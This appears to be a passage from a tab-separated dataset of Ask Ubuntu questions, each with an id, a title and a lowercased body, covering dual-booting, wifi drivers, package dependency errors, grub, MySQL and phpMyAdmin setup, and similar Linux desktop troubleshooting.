118560	can i install ubuntu into a windows dynamic volume ?	i have a hp 6166tx laptop with factory fitted windows 7 home edition . i tried to install ubuntu inside windows , in a shrink volume ( which is dynamic type ) . but it gives an error in the end and stops the installer . is it possible to install ubuntu into a windows dynamic volume ? if it is , then how ? please help me with this .
118561	rss reader that syncs with google reader ?	i love reeder on the mac and ios . is there an rss reader for linux/ubuntu that syncs with google reader ?
118565	computer info when login in a tty virtual shell	when i 'm logging into a tty virtual shell , i obtain system information of the computer , like system load , memory usage , hard disc space on / ... i installed ubuntu on two others computer but they do n't show me system informations on tty virtual login , why ? which packet or script makes this information available ? thanks for your help .
118570	alienware m17x r3 : possible downclock	i installed recently kubuntu 11.10 32 bits ( had graphics driver issues , wanted to try on 32 bits version ) on my new alienware m17x , with a core i7-2670qm cpu . cores are supposed to be clocked at 2.2 ghz , however the output of $ cat /proc/cpuinfo | grep -i `` hz '' gives me : model name : intel ( r ) core ( tm ) i7-2670qm cpu @ 2.20ghz cpu mhz : 800.000 model name : intel ( r ) core ( tm ) i7-2670qm cpu @ 2.20ghz cpu mhz : 800.000 model name : intel ( r ) core ( tm ) i7-2670qm cpu @ 2.20ghz cpu mhz : 800.000 model name : intel ( r ) core ( tm ) i7-2670qm cpu @ 2.20ghz cpu mhz : 800.000 model name : intel ( r ) core ( tm ) i7-2670qm cpu @ 2.20ghz cpu mhz : 800.000 model name : intel ( r ) core ( tm ) i7-2670qm cpu @ 2.20ghz cpu mhz : 800.000 model name : intel ( r ) core ( tm ) i7-2670qm cpu @ 2.20ghz cpu mhz : 800.000 model name : intel ( r ) core ( tm ) i7-2670qm cpu @ 2.20ghz cpu mhz : 800.000 if useful , the ac adapter is plugged in ( yet the ouput is the same when the computer is powered only by the battery ) and i have firefox and eclipse running . does /proc/cpuinfo reflect a possible automatic downclock made to save power if processor load is low or is this output abnormal ? edit : ok , i checked and yes , the ouput does vary in function of the load . i reach 2.2 ghz when needed . but my following problem remains . i was checking my cpu clocking because i experienced poor performances when reading 720p video files on ubuntu with vlc or mplayer when on battery ( and i believe vlc by default only uses cpu , not gpu to decode ) , whereas i have n't got such problems with vlc on windows ( which made me think it was n't coming from a bios option , plus every option in the bios regarding the cpu is turned on ) .
118573	why does n't the printscreen dialog show up in gnome ?	i 'm using gnome-shell on ubuntu 12.04 . when i hit prtsc to take a screenshot , it works , but it automatically saves the screenshot in my pictures folder . there 's no dialogue asking where to save . it does show the dialogue box under unity though .
118574	how can i remove eog without breaking the unity-2d session ?	on my ubuntu 11.10 install , i want to use gpicview instead of eog . therefore , i 'd like to remove eog . whenever i do sudo apt-get remove eog though , i 'm notified that doing this will also remove ubuntu-desktop . but i want to keep using unity 2d . how can i remove eog while keeping the unity-2d session ?
118578	change logon screen display configuration	i 'm on ubuntu 11.10 and i 'd like to change the resolution of the logon screen . i 'm using two screens : the main one ( which is the laptop one ) is 1600*900 , the second is 1440*900 . the logon manager started in mirrored mode for both screens . i would like it starts only on the main screen . is there any way to do that ? thanks .
118581	how do i boot into an older kernel ?	i install new kernel ( from launchpad mainline kernel ) in my ubuntu 12.04 , in order to test some issues i 'm having . now , older kernels do n't appear in the list at boot , just the new kernel . i can boot from the old kernel changing boot parameters at grub time , but i rather like to have a list entry i can select .
118584	cpu usage gets to 100 % whenever openning an application	i 'm using ubuntu 12.04 unity ( the problem was there before i upgrade ) with an intel速 pentium ( r ) 4 cpu 2.66ghz and my problem is that the cpu usage gets to 100 % whenever i open an application and sometimes it crashes this is a snapshot of the system monitor : http : //farm8.staticflickr.com/7078/7042247815_480c37aeb0_b.jpg if there is a way to lower it i ll be thankful if you tell me
118591	kde opens recent session applications	when i restart kde , it launches all the applications i opened after restart . how to disable this feature ?
118593	lxde interactive password change	i wanted to know if its possible that lxde ask for a new password at login time when the password has expired . i can see that it works at console login it ask me for a password change , however , on graphic mode ( lxde ) it just returns to login screen after entered my user and password and never asks me for a password chage . let me know if its possible to do so . i am ussing lubuntu . thanks in advance to all .
118600	why does mplayer freeze when running from scheduled tasks ?	i 've been trying to use scheduled tasks and mplayer as an alarm clock , scheduling mplayer /path/to/file.mp3 for my morning wakeup time , but whenever it reaches the scheduled time , mplayer freezes only a few seconds into the mp3 . system monitor indicates that it 's still running and taking up most of a cpu core , it 's just not playing audio . the weird thing is that when i select `` run selected task , '' it goes just fine . ( and in a terminal , which might be related . ) it just does n't work when it 's running as a scheduled thing , whether it 's as a recurring or one-time task . so it has to have something to do with the scheduler itself , and i do n't know much about cron . what gives ?
118603	what is the recommended method for getting & installing updates for an alpha or beta release ?	i am new and do not , of course , know a lot about installing and maintaining an ubuntu release . one of the `` tricks '' i have learned to use is sudo apt-get update followed by sudo apt-get upgrade to download and install updates for the installed software . i recently installed beta 2 of ubuntu 12.04 ( precise pangolin ? ) to a test disk/partition just to see what it was like . after the install i updated the software using the commands i listed above because , well , that is what i always do . was this a mistake ? are the alpha & beta releases of ubuntu updated in a different way ? i recently saw reference to the dist-upgrade command for apt-get and decided i would try using that to update 12.04 . a lot of programs were upgraded , including the kernel so i 'm wondering if using just sudo apt-get upgrade was the wrong way to go for a release which is still under development .
118606	how to use zte ax326 modem on ubuntu 10.10 ?	i want to use zte ax 326 modem on ubuntu , but this is not working . can you help me how can i use usb modem on ubuntu 10.10 , please . thanks .
118608	how can i remove burg themes ?	please help . i downloaded several burg themes using super-boot-manager . later i deleted super-boot_manager . now all the burg themes have become redundant , but blocking any update through synaptic . i can not even remove these themes whatever i may try to do . how can i remove these burg themes ?
118612	monitor can not be detected , missing a driver ?	i have a dell xps i5 . i installed ubuntu 11.10 , but it can not detect my samsung monitor . i do n't know if i 'm missing a driver , i 'm currently using a nvidia gpu . i hope someone can point me in the right direction .
118617	can not start wubi 11.10 without `` nomodeset ''	i am a bit of a linux noob , so help me out a bit . i installed ubuntu 11.10 in wubi on my acer aspire 5734z laptop ( [ specs ] [ 1 ] ) and when i boot , i have to use nomodeset by pressing e at bootup , or the backlight wo n't work . i am sure i need to do something with acpi , but am not sure how . please help .
118625	ec2 kernel without rpcsec_gss_krb5 mod	i 'm looking into setting up nfsv4 with kerberos ( via this ) . i believe i have everything working except i 'm running kernel 3.0.0-16-virtual which does n't seem to include rpcsec_gss_krb5 . which causes this command modprobe rpcsec_gss_krb5 to fail with fatal : module rpcsec_gss_krb5 not found.. if i try to proceed mounting the nfs without this module . # sudo mount -t nfs4 -o sec=krb5 *my ip* : / /mnt stdout : mount.nfs4 : an incorrect mount option was specified syslog gss_create : pseudoflavor 390003 not found ! rpc : could n't create auth handle ( flavor 390003 ) how should i ago about adding this mod to the ec2 ubuntu kernel ?
118626	get permissions on /var/www	ive installed a lamp server in my machine , and i would like to edit the files in /var/www/ but i dont want to have to switch to super user everytime . how can i set the permissions so that i can edit the contents of the folder with my everyday user account ? thanks
118627	latest ubuntu version/upgrade with 64 bit	just looking to know what the latest downloadable version/upgrade of ubuntu will provide 64 bit support . asus g51j series , i7 core . currenlt with ubuntu 10.10. tried to upgrade to 11.04 back in jan 12 , didnt work figure due to the 32 bit download .
118630	dependencies error	i recently installed openoffice.org because libreoffice was n't working . i removed libreoffice with this command : sudo apt-get purge libreoffice-core and then installed openoffice . now i get an error saying that brokencount > 0 and i can not install / remove anything . any idea why ?
118634	ca n't access windows 7 shared files on ubuntu 11.10	i just set up ubuntu 11.10 and samba . i got it to access shares on a vista machine , but when i try to access the shares on a windows 7 machine it asks for a username , domain , and password . i have no password set up on the windows 7 machine so i put in the username , and domain try to connect and the password prompt keeps appearing ... also tried guest and admin with no luck ... i 've tried many different fixes ( modifying registry entries & advanced securities on the win 7 machine ) with no luck . thanks
118636	only show grub when requested	can the grub be set to operate like os x , where by it only shows when specifically requested by a start up key or command before retart ?
118643	trying to install phpmyadmin but ca n't move from one folder to /var/www	i ca n't seem to move folders or create new folders in the /var/www folder . this is the first time i have tried using ubuntu and i ca n't seem to find a reason why i 'm not able to move folders , i only have one account so should have all the priviliges .
118646	get rid of windows 7 32bit	i picked to install and partition with windows and ubuntu 11.10 but now i want to get rid of windows and just use ubuntu . how do i do that ?
118647	external monitors shut off when laptop lid closes	i have researched the solution ... gconftool-2 -- type string -- set /apps/gnome-power-manager/buttons/lid_ac `` nothing '' does not fix it . i have two external monitors and when i close my lid the settings are reset and the laptop 's monitor is set to the default . thanks ! gsettings list-recursively org.gnome.settings-daemon.plugins.power org.gnome.settings-daemon.plugins.power active true org.gnome.settings-daemon.plugins.power button-hibernate 'nothing ' org.gnome.settings-daemon.plugins.power button-power 'nothing ' org.gnome.settings-daemon.plugins.power button-sleep 'nothing ' org.gnome.settings-daemon.plugins.power button-suspend 'nothing ' org.gnome.settings-daemon.plugins.power critical-battery-action 'suspend ' org.gnome.settings-daemon.plugins.power idle-brightness 30 org.gnome.settings-daemon.plugins.power idle-dim-ac false org.gnome.settings-daemon.plugins.power idle-dim-battery true org.gnome.settings-daemon.plugins.power idle-dim-time 10 org.gnome.settings-daemon.plugins.power lid-close-ac-action 'nothing ' org.gnome.settings-daemon.plugins.power lid-close-battery-action 'nothing ' org.gnome.settings-daemon.plugins.power notify-perhaps-recall true org.gnome.settings-daemon.plugins.power percentage-action 2 org.gnome.settings-daemon.plugins.power percentage-critical 3 org.gnome.settings-daemon.plugins.power percentage-low 10 org.gnome.settings-daemon.plugins.power priority 1 org.gnome.settings-daemon.plugins.power sleep-display-ac 600 org.gnome.settings-daemon.plugins.power sleep-display-battery 600 org.gnome.settings-daemon.plugins.power sleep-inactive-ac false org.gnome.settings-daemon.plugins.power sleep-inactive-ac-timeout 0 org.gnome.settings-daemon.plugins.power sleep-inactive-ac-type 'suspend ' org.gnome.settings-daemon.plugins.power sleep-inactive-battery true org.gnome.settings-daemon.plugins.power sleep-inactive-battery-timeout 0 org.gnome.settings-daemon.plugins.power sleep-inactive-battery-type 'suspend ' org.gnome.settings-daemon.plugins.power time-action 120 org.gnome.settings-daemon.plugins.power time-critical 300 org.gnome.settings-daemon.plugins.power time-low 1200 org.gnome.settings-daemon.plugins.power use-time-for-policy true
118655	gui application on ( from ? ) a server without x11	is it possible to run a gui application ( firefox / xterm / gnu plot ) on an ubuntu server ( the server does not have x11 installed ) over an ssh with x11 forwarding ( the client has x11 installed ) ? i am unable to experiment and try it out : - ( has anyone tried this ?
118659	shared wireless network immediately disconnects	i have an ethernet cable coming into my pc and i have a usb wireless adapter . i want to create a wifi network that would use the wired connection 's internet . so i 've added a new wireless network , but now it connects and immediately disconnects - i see `` connection established '' then `` disconnected '' and so on ( i 've set it to connect automatically ) . the adapter i have is bus 002 device 002 : id 0bda:8187 realtek semiconductor corp. [ rtl8187 ] [ 1 ] wireless adapter . the linked page contains some instructions , but i ca n't download the win98 driver . is that what i need to fix the problem ? also , there are some interesting syslog entries : apr 3 22:54:01 r6 networkmanager [ 1095 ] : < info > config : set interface ap_scan to 2 apr 3 22:54:01 r6 wpa_supplicant [ 1351 ] : trying to associate with ssid 'vxcvxcz' apr 3 22:54:03 r6 wpa_supplicant [ 1351 ] : nl80211 : failed to set interface into ibss mode apr 3 22:54:03 r6 wpa_supplicant [ 1351 ] : association request to the driver failed** apr 3 22:54:03 r6 wpa_supplicant [ 1351 ] : ctrl-event-connected - connection to 00:00:00:00:00:00 completed ( reauth ) [ id=-1 id_str= ] apr 3 22:54:03 r6 networkmanager [ 1095 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > completed apr 3 22:54:03 r6 networkmanager [ 1095 ] : < info > activation ( wlan0/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'vxcvxcz ' . apr 3 22:54:03 r6 networkmanager [ 1095 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) scheduled . apr 3 22:54:03 r6 networkmanager [ 1095 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) started ... apr 3 22:54:03 r6 networkmanager [ 1095 ] : < info > ( wlan0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] apr 3 22:54:03 r6 networkmanager [ 1095 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ip4 configure get ) scheduled ... apr 3 22:54:03 r6 networkmanager [ 1095 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) complete . apr 3 22:54:03 r6 networkmanager [ 1095 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ip4 configure get ) started ... apr 3 22:54:03 r6 networkmanager [ 1095 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ip configure commit ) started ... apr 3 22:54:03 r6 avahi-daemon [ 1085 ] : joining mdns multicast group on interface wlan0.ipv4 with address 10.42.43.1 . apr 3 22:54:03 r6 dnsmasq [ 1339 ] : reading /etc/resolv.conf apr 3 22:54:03 r6 avahi-daemon [ 1085 ] : new relevant interface wlan0.ipv4 for mdns . apr 3 22:54:03 r6 avahi-daemon [ 1085 ] : registering new address record for 10.42.43.1 on wlan0.ipv4 . apr 3 22:54:03 r6 dnsmasq [ 1339 ] : using nameserver 192.168.1.1 # 53 apr 3 22:54:03 r6 kernel : [ 688.265466 ] addrconf ( netdev_up ) : wlan0 : link is not ready
118661	what other fronts for mplayer are there beside smplayer and umplayer ?	i am aware that it is hard to find better than smplayer - - not to mention that vlc is beyond compare ; - ) but each has its own quirks -- and i like testing different alternatives even to the best applications out there , especially audio and video players . without seeking there 's no finding , is it ? please report on players that you tested and like , not just links to names of players that exist but are hardly used .
118666	maximizing battery life in terminal only mode	a while ago talked to a buddy , who managed to enlengthen battery life a lot by shutting down graphics card , slowing down cpu etc . ofc we we 're talking about terminal only , when u dont need those things . for some time i try to recreate his setup , withous succes . has anyone tried extreme battery life enlengthing ? i would love to see some tips .
118667	alternative way to start mysql server other than upstart ?	i have a chrooted 10.04 lts installation on a nas , it works great but breaks upstart very badly . mysql only works via upstart these days , so i created a workaround to start like this : dtach -n /opt/svc/screens/mysql.dtach /usr/sbin/mysqld however , i consider this very evil . is there a better way to start mysql server other than upstart ? thanks !
118671	good workflow for updating r modules around r-cran updates ?	i like that r updates frequently to give me the best new packages , but it does seem to pose a problem for my r scripts on cron schedules . i noticed that every time ubuntu updater updates my r-base package , when i try to run my scripts , it 'll say something like `` there is no library ( xml ) '' . then i have to go `` update.packages ( `` xml '' ) '' to get the new version of that package that is compatible with my new version of r. i have a lot of packages installed , so i find myself fairly regularly tracking them down and making long commands like `` update.packages ( c ( `` xml '' , `` ggplot2 '' , `` timeseries '' ) ) '' . when i forget to do this after an update , all my r cron scripts fail . does anyone have a good workflow for automatically checking which packages i have already installed , and updating them when they need to be updated ?
118673	added ppa but apt-get update shows that it 's url is being ignored	i have just added the handbrake ppa to my ubuntu system using apt-add-repository ppa : stebbins/handbrake-releases as root . i 've then run apt-get update but whenever i run this i get the following line in the output : ign http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu/ lucid/main translation-en_gb i assume that this means that this url is being ignored for some reason . when i try and run apt-get install handbrake it tells me that there is nowhere to install it from . what am i doing wrong ?
118674	are ubuntu 10.10 maverick meerkat repositories going to be removed or deleted after april 10-2012 ?	i 'm using ubuntu 10.10 maverick meerkat and i would like to know if the repositories of this ubuntu version are going to be removed or deleted from the main servers after april 10 ( that 's the day when ubuntu 10.10 's life ends ) or if only there will be no more updates . thank you very much = )
118675	mute key mutes alsa and pulseaudio , but unmutes only alsa	when i press the mute key on my keyboard , both the alsa master channel and the pulseaudio master channel get muted , pressing it again only unmutes the alsa master channel , the pulseaudio master channel keeps muted . result : no sound . how do i fix that ?
118677	i would like to fully erase my hard drive and start from a clean slate with ubuntu	how do i do that ? can i fully format the internal hard drive and then install ubuntu , or would that leave all systems , including usb and cd drives unoperable . otherwise , how do i remove windows completely and install ubuntu ? thanks , sorry if this is too dumb a question .
118686	how to install 11.10 package on 11.04 ?	i use rsnapshot to backup various machines , and there is a bug fix between 1.3.1-1 and 1.3.1-3 which is important to me . unfortunately , this bug fix is only packaged for oneiric , and a couple of my machines are still running natty . is there a simple way of installing this package from the oneiric repository on my natty machines ?
118687	problems dual-booting back into windows 7	okay , so i 'm relatively new to ubuntu . i 've searched and found solutions related to my problem but none that have so far directly worked . after figuring out how to free up space to make a partition on my computer in order to install ubuntu 11.10 side-by-side with windows and installing it , and rebooting my computer , i found myself staring at the ubuntu login . but it never asked me whether i wanted to boot windows 7 or ubuntu , and every time i restart the computer it takes me straight to the ubuntu login . my computer is an emachine el1333g-01w . windows 7 home premium 64-bit was pre-installed originally , and the entire hard drive was basically dedicated as `` emachines '' ( which made it really annoying installing ubuntu since they stole the whole hard drive as a windows partition , which i figured how to cut down ) . after a little ( frustrating ) search i discovered something called the bootloader and that ubuntu automatically uses grub to let you choose which os to use . the problem is , grub does n't seem to be working , or it does n't seem to have been installed at all . i 've looked through the software center and downloaded what i believed to be grub but that did n't work . when i turn on the computer , the first thing i see is the `` e '' symbol with two options on the bottom : boot options and setup menu , which prompts me to believe the bootloader was n't properly implemented or installed . then the screen displays `` input display out of range '' for a few seconds , and then the ubuntu login pops up . i found something called boot-repair but the ubuntu would n't run it whether as a file or off a cd i burned . entering `` grub '' into the terminal tells me it 's not installed , and after following directions to install it and rebooting , the same thing occurs . typing `` grub '' gets me `` probing devices to guess bios drives . this may take a long time . `` , so i 've been waiting for a while , with nothing happening . most problems i see involve people unable to boot into windows from grub , but grub does n't even show up on my system . can someone help me with this ?
118692	how to enable 801.11 n with bcm4313	i own a asus 1215n with the bcm4313 wireless radio . in windows i can connect to `` n '' wireless networks without problem however ubuntu 11.10 can only `` see '' and connect to `` g '' networks . i have already read through how do i get my broadcom bcm4313 working correctly ? and how do i get the broadcom bcm4313 wireless working on an asus 1015px ? . according to them i run the correct drivers and i have blacklisted everything useless . now this link http : //ubuntuforums.org/showthread.php ? t=1892229 says the 11.10 drivers have a bug and the op solves this by compling himself a new driver , but how ?
118700	how to get skeltrack up and running in ubuntu 11.10 amd64	i saw an interesting post on iloveubuntu.net called skeltrack free and open source kinect my question is can i get it up and running on my laptop with web-cam using ubuntu 11.10 amd64 or do you need kinect hardware : (
118702	i can not install or find downloads on my laptop	when i try to download any thing of any sort it gives me this weird folder and it does n't install or go on my computer . i am not sure how to fix it . please help ?
118712	how do i remove lubuntu-desktop ?	i wanted to try lubuntu-desktop so i installed it with sudo apt-get install lubuntu-desktop . but when i did n't like it i wanted to remove it with sudo apt-get remove lubuntu-desktop ( then with auto-remove ) but my startup / shutdown screen does still say lubuntu . so how do i remove lubuntu-desktop ? atempt one : sudo apt-get remove lubuntu-desktop i 've also tried to remove and install ubuntu-desktop , but none has worked .
118713	why does a stopped vlc inhibit suspend ?	when vlc is running , it prevents the computer from suspending . i want it to allow suspend if vlc is stopped ( the media finished playing ) . how can this be done ?
118715	media monkey music management alternative ?	media monkey has some great and simple music management tools , like batch renaming , moving , fetching meta-data , etc . i use picard for some music organisation , but it does n't have as many options , namely that it will only automatically rename music it finds in its database . i have a lot of classical music which is n't in any data base or is already named how i want it ( in their file-names ) and i want to write the correct meta data and organise these files into folders . so is there other music management applications in linux other than picard with a similar feature set to media monkey ?
118716	how to use unity 3d and gnome shell without any drivers ?	currently i do n't have any driver available for the laptop that i use , and because of this i only can use unity 2d and gnome panel . i have ubuntu 11.10 and ubuntu 12.04 installed and no drivers for both . i would like to use unity 3d and gnome shell..instead of unity and gnome panel or at least have that option even if computer became a little slower . is there a way of enabling unity 3d and gnome without any driver had been installed ? ( my video card is : 01:00.0 vga compatible controller : silicon integrated systems [ sis ] 771/671 pcie vga display adapter ( rev 10 ) )
118733	how to force empathy internet messaging to change default webcam ?	i just recently bought a new webcam . it is usb powered . for personal reasons , i wish to not use the built in webcam that came with my netbook . i want to use this new one . i love empathy , it is a great chat client . but , i ca n't seem to switch my default webcam in empathy from the built in webcam , to the one i just bought . so , is there a way to force empathy to use the usb powered webcam , rather than the built in webcam ? let 's eliminate some options . i tried the gstreamer-properties method , root and normal user . no use . i tried the configuration editor method as-well , trying to manually change web-cam defaults . i also tried blacklisting the built in web-cams driver , but my second web-cam also runs off that same driver so that option was pointless because it disabled both web-cams , instead of the one i needed to use .
118735	how do i get the graphical bootsplash on my macbook air ?	after upgrading to 12.04 , the plymouth bootsplash screen is n't present . instead i get a text based version . how can i get the higher-resolution graphical plymouth bootsplash back ?
118741	what happens if i install updates without checking for new updates first ?	let 's say i open the update manager , and my package list is a couple of days old , or i do apt-get upgrade without doing an apt-get update first , what is the result of this ? if there have been updates since i last did a 'check ' in the update manager , do i not get the latest version ? or do i simply not get updates on packages which had not updates at the time of my last check ?
118748	start wifi in adhoc mode right after boot	i 'm trying to set my wireless card to adhoc mode after the system starts . i have created a shell script following this guide : https : //help.ubuntu.com/community/wifidocs/adhoc # wireless_extensions_cli_tools_method if i execute the script manually , everything works fine . however if i add it to the init.d as described here : https : //help.ubuntu.com/community/ubuntubootuphowto # installing_custom_init-scripts or if i set it as a cron job triggered at `` @ reboot '' , the wireless interface does n't seem to start . i 'm guessing that i can configure the card to start directly into the adhoc mode with /etc/network but i do n't really know how . can anybody point me in the right direction ?
118749	package system is broken . how to fix it ?	i just recently bought an arduino and requires gcc-avr/avrdude to compile the software . i installed avr for another microprocessor component a while ago but is obviously an outdated version ( gcc version 3.3 20030512 ( prerelease ) ) so i went ahead to update these but it did n't work . ( please note that before hand i also broke my aptdaemon through an incomplete wine installation ( could n't get passed font installation agreement ) but i fixed that via a re-installation then accepting the agreement . ) i am trying to update these by running bingo 's build script but the dependencies it requires can not be installed due to avr ... terminal reports reading package lists ... done building dependency tree reading state information ... done build-essential is already the newest version . libncurses5-dev is already the newest version . libncurses5-dev set to manually installed . libusb-0.1-4 is already the newest version . libx11-dev is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : arduino-core : depends : gcc-avr but it is not going to be installed avr-libc : depends : gcc-avr ( > = 1:4.3.4 ) but it is not going to be installed depends : binutils-avr ( > = 2.20 ) but it is not going to be installed binutils-dev : depends : binutils ( = 2.21.0.20110327-2ubuntu3 ) but 2.21.0.20110327-2ubuntu2 is to be installed libcwidget-dev : depends : libcwidget3 ( = 0.5.16-3ubuntu2 ) but it is not going to be installed depends : libsigc++-2.0-dev but it is not going to be installed depends : libncursesw5-dev but it is not going to be installed libmpfr-dev : depends : libgmp3-dev ( > = 4.2.dfsg-1 ) but it is not going to be installed python-dev : depends : python ( = 2.7.1-0ubuntu5.1 ) but 2.7.1-0ubuntu5 is to be installed depends : python2.7-dev ( > = 2.7.1-1~ ) but it is not going to be installed tk8.4-dev : depends : tk8.4 ( = 8.4.19-4 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . but running apt-get -f install results in ( reading database ... 163021 files and directories currently installed . ) unpacking binutils-avr ( from ... /binutils-avr_2.20.1-1ubuntu2_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/binutils-avr_2.20.1-1ubuntu2_i386.deb ( -- unpack ) : trying to overwrite '/usr/bin/avr-size ' , which is also in package avr-binutils 2.13.90.030512-2 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) unpacking gcc-avr ( from ... /gcc-avr_1 % 3a4.3.5-1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/gcc-avr_1 % 3a4.3.5-1_i386.deb ( -- unpack ) : trying to overwrite '/usr/bin/avr-g++ ' , which is also in package avr-gcc-c++ 3.2.90.20030512-2 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/binutils-avr_2.20.1-1ubuntu2_i386.deb /var/cache/apt/archives/gcc-avr_1 % 3a4.3.5-1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have tried running update manager and updating my system via it but all i get is an error message the following packages have unmet dependencies : arduino-core : depends : gcc-avr but it is not installed avr-libc : depends : gcc-avr ( > = 1:4.3.4 ) but it is not installed depends : binutils-avr ( > = 2.20 ) but it is not installed which then tells me to try running apt-get -f install which just results the same as last time . so how can i fix my system , i really need the new avr , please : ) btw , my system is ubuntu 11.04
118756	how to install ubuntu on droid bionic	i checked the official supported device list and noticed the droid bionic was not listed despite its 1ghz dual core processor and 1gb of ram . is there a working setup with a specific rom that works with it ?
118764	how can i give windows-installed ubuntu more room ?	i installed ubuntu on my laptop from windows 7 with the windows installer on the ubuntu website . my laptop has two hard disks in it . i 've run out of room on my ubuntu installation and was wondering if there was a simple way to give it more space . does anyone know how to do this ?
118772	how to change root password for mysql and phpmyadmin	i 've set up mysql and phpmyadmin and chose not to set a password when installing hoping that once set up i could login with root and no password but i get the following error from phpmyadmin : login without a password is forbidden by configuration ( see allownopassword ) i have previously moved the phpmyadmin folder to /var/www/ i have tried changing the following line $ cfg [ 'servers ' ] [ $ i ] [ 'allownopassword ' ] = false ; to $ cfg [ 'servers ' ] [ $ i ] [ 'allownopassword ' ] = true ; but still had no success , so i am wondering is there a way i can change the root passwords for both so i can access phpmyadmin and create databases .
118775	how do i install the drivers for my hcf conexant modem ?	how do i install drivers for my hcf conexant modem in ubuntu 11.10 ? unfortunately conexant driver is old with no update for new kernel version ( upper 2.6 ) so i cant install and use my hcf modem . i tried to compile it but when i want to configure it i have error ! how should i compile and configure this driver with a newer kernel ?
118788	configuring my ralink rt61 wifi card with ubuntu 10.10 server	i 'm trying to configure my wifi card in ubuntu 10.10 server ( no gui , therefore no networkmanager ) . i 've found a bunch of similar questions here , but none that quite match my problem . my card is recognised ; running `` iwconfig wlan0 '' gives something like this : wlan0 ieee 802.11g essid : '' networkname '' mode : managed frequency:2.437 ghz access point : not-associated bit rate:54 mb/s tx-power:20 dbm sensitivity=-121 dbm rts thr=2347 b fragment thr=2346 b power management : off and i can see my wifi network 's ssid with `` iwlist scan '' , so the card is definitely working on some level . i 've tried following the ubuntu docs , specifically running : iwconfig wlan0 mode managed iwconfig wlan0 channel 4 iwconfig wlan0 essid networkname but this has n't associated the network with an access point . i 've also tried the command `` iwconfig wlan0 key s : mypassphrase '' , but this is is rejected with `` invalid argument '' -- do i need to enter the hex form of the key rather than the passphrase ? or am i missing something else entirely ?
118789	how to use a hex color code in zsh ?	i have color config of my shell prompt= ' % { $ fg_bold [ red ] % } â % { $ fg_bold [ green ] % } % p % { $ fg [ cyan ] % } % c % { $ fg_bold [ blue ] % } $ ( git_prompt_info ) % { $ fg_bold [ blue ] % } % % { $ reset_color % } ' how to use hex color code ?
118794	stuck on `` preparing ... '' when restoring from deja-dup backup	i 'm trying to restore my deja-dup backup from a certain date . however during restore after selecting the date to restore from i get a `` restoring ... `` preparing '' ... '' window that just seems stuck there doing nothing forever ( past 1/2 hour ) . there was a point when i was prompted for the `` encryption password '' but i do n't remember it , so i just entered one . i never got any error if the password i entered was not accepted .
118795	ca n't add repository due to 'missing ' fingerprint	i am trying to install nginx with php but when i am following a guide , like this one : http : //www.justincarmony.com/blog/2011/10/24/setting-up-nginx-php-fpm-on-ubuntu-10-04/ i am always told to add that repository ( sudo add-apt-repository ppa : brianmercer/php ) but i ca n't . i 'll just get `` error : ca n't find signing_key_fingerprint at https : //launchpad.net/api/1.0/~nginx/+archive/php5 '' and when i go to that website i find that there is a fingerprint specified but still i get that error message . is there anyway to specify it myself ? and for the last thing , how i can fix this so i can continue my installation towards a working nginx enviroment with php . thanks for your advice and better wisdom .
118796	windows connect for svn	i am wondering if there is any possible approach for this . i am planning to build our svn repository locally on my ubuntu machine . some of my team will be using windows and will be needing to connect on my ubuntu for the svn repository actions . anyone can please provide me with some steps ( if this is feasible ) . thanks .
118800	transfer partially complete torrent from windows to ubuntu ?	i have started a torrent in windows ( vuze ) and it is at 18 % , however i wish to continue the torrent in ubuntu on another computer . can i simply copy the so-far-completed downloaded files to ubuntu , then re-open the torrent in ubuntu ( transmission ) and set the download location to where i copied the files to ? or is there something else i must do ?
118802	mysql server fails to start automatically at boot	if i start mysql cluster server with this command i get an error : root @ v-server1 : /usr/local/mysql-cluster # /etc/init.d/mysql.server start starting mysql the server quit without updating pid file ( /var/lib/mysql/v-server1.pid ) . root @ v-server1 : /usr/local/mysql-cluster # but if i start via this command the server starts without problems : root @ v-server1 : /usr/local # cd mysql-cluster root @ v-server1 : /usr/local/mysql-cluster # bin/mysqld_safe -- defaults-extra-file=/etc/mysqld-cluster.cf -- user=mysql -- datadir=/var/lib/mysql -- basedir=/usr/local/mysql-cluster & [ 1 ] 29119 120404 13:44:00 mysqld_safe logging to '/var/log/mysql/error.log ' . 120404 13:44:01 mysqld_safe starting mysqld daemon with databases from /var/lib/mysql ^c root @ v-server1 : /usr/local/mysql-cluster # /etc/init.d/mysql.server status mysql running ( 29524 ) my problem is that i want to have the server started automatically when i switch on the system .
118805	network connection fails when downloading data	in the past few weeks , i 've noticed my network connection becoming unstable while downloading files . i 'm not sure how to diagnose this issue . i 've found that my network connections appear to be temporarily unresponsive ( for periods up to a minute or so ) while i 'm downloading a file ( that 's large enough to not be downloaded instantly ) . the problem occurs when downloading data through a webbrowser , but also when using scp to download data from a remote location . during the period in which network connections are unresponsive , every resource that i try to access over the network is unavailable . this includes : the download itself ( scp reports a 'stalled ' download ) web pages ( wo n't load - browsers report 'resource unavailable ' ) ssh sessions ( cli freezes ) vpn connections ( connections terminate ) im client connections ( client starts reconnection attempts ) ... ( everything is pretty much dead ) i 've noticed that during such a period , i can not even access the ( web-based ) administrative console of the router on my lan at home ( although it remains reachable for other devices ) . the problem occurs when connected to my home network , but also when i 'm in the office . other devices than my laptop are not affected . given the above two characteristics i assume the problem cause lies within my laptop , not the network infrastructure . i 'm running ubuntu 11.10 . apart from applying automatic updates from ubuntu , i ca n't think of a change that i applied to the os that could have started the problems . i 'm absolutely positive that this issue did not occur up to a few weeks ago ( as it 's very noticeable , and only started to annoy me in the last few days ) . when the problem occurs , applications that make use of a network connection fail visibly ( i get popups telling me 